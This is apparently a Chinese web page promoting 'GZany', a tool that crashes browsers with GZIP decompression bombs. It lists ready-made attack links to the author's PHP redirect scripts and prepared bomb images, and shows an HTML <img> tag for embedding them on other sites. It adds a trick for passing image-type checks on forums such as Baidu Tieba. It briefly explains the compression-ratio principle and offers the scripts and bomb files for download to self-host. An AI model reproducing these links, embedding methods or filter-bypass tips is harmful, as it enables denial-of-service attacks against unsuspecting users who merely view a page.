Cover25

GZany 让网页爆炸!让浏览器卡死!

GZany 是一个通过在线访问让浏览器崩溃 的在线工具

当大部分支持GZIP压缩技术的浏览器访问特定 链接 或者 图片 时,会消耗大量的内存资源以至于浏览器卡死甚至崩溃

b_d 图片爆炸

工具:  b_d.php
在网页以图片外链的形式使用,就能制造出能让浏览器卡死的图片。
方法:  b_d.php?f=炸弹图片的链接

可当做外链图片的链接:
http://nullice.com/IEvil/b_d.php?f=cdn-nullice-old.nullice.com/O_O.GZ
http://nullice.com/IEvil/b_d.php?f=cdn-nullice-old.nullice.com/O_OBIG.png.gz
http://nullice.com/IEvil/b_d.php?f=cdn-nullice-old.nullice.com/O_Obmaxp.gz
http://nullice.com/IEvil/b_d.php?f=cdn-nullice-old.nullice.com/O_Opng_bumax.png.gz
http://nullice.com/IEvil/b_d.php?f=cdn-nullice-old.nullice.com/O_Opng_code_max.png.gz
http://nullice.com/IEvil/b_d.php?f=cdn-nullice-old.nullice.com/O_Opng_huang_max.png.gz
http://nullice.com/IEvil/b_d.php?f=cdn-nullice-old.nullice.com/O_Opng_uncode_max.gz

(在百度贴吧等需要判断图片类型的地方插入时在末尾加&t=.png,如http://nullice.com/IEvil/b_d.php?f=bcs.duapp.com/nullice/O_O.GZ&t=.png)


在能插入外链图片的网站把以上链接作为图片地址插入 
html 代码.

例如:<img src=”http://nullice.com/IEvil/b_d.php?f=cdn-nullice-old.nullice.com/O_O.GZ”>

因为本网站服务器流量有限,所以以上链接可能会失效
你可以在本文底部下载特殊的图片炸弹上传至自己的可外链网络空间(如七牛云百度
http://nullice.com/IEvil/b_d.php?f=
把结尾的f=后填入图片炸弹的地址

演示页面

v_v 通用爆炸

工具: v_v.php
除了可以做成图片外链,也能做成其他类型的GZIP炸弹,比如指向一个GZIP炸弹网页的链接,
方法:  v_v?f=各种GZIP炸弹的链接&t=炸弹类型
实例:
http://nullice.com/IEvil/v_v.php?f=cdn-nullice-old.nullice.com/O_O.GZ&t=image/png
http://nullice.com/IEvil/v_v.php?f=cdn-nullice-old.nullice.com/O_O.php&t=text/html


爆炸链接
(O_O.php是一个让GZIP炸弹网页)

原理

HTTP/1.1 协议中规定了一种利用通过GZIP压缩网络内容减少传输数据大小的技术
网站上的内容以GZIP格式压缩,下载到浏览器后再解压出来显示

如果构造一种压缩比率非常高的GZIP内容,如把1GB的图片压缩到1MB,在浏览器端因为解压消耗内容过大,或者使用缓存超过了一定程度,就会卡死甚至死机

构造高压缩比的GZIP文件并非难事,因为冗余的数据压缩比很高,在图片数据中插入大量重复内容的数据就能制造出超高压缩比的文件。如果构造出超高分辨率的图片效果就更明显了。

支持GZIP的浏览器大多都有这个缺陷,Opear、Chrome、FF等都有效(测试时有效,可能版本更新后就修复这个问题了)

源代码/文件 本地下载
内容:

  • b_d.php 图片炸弹转向
    参数:f=指向文件(不用带html)
  • O_O.php GZIP压缩的php炸弹转向
    参数:f=指向文件(不用带html)
    参数:t=指定指向文件的类型(如image/png、text/html)
    v_v.php通用炸弹转向
    参数:f=指向文件(不用带html)
    参数:t=指定指向文件的类型(如image/png、text/html)

已经压缩的高压缩比图片:

O_OBIG.png.gz
O_Obmaxp.gz
O_Opng_bumax.png.gz
O_Opng_code_max.png.gz
O_Opng_huang_max.png.gz
O_Opng_uncode_max.gz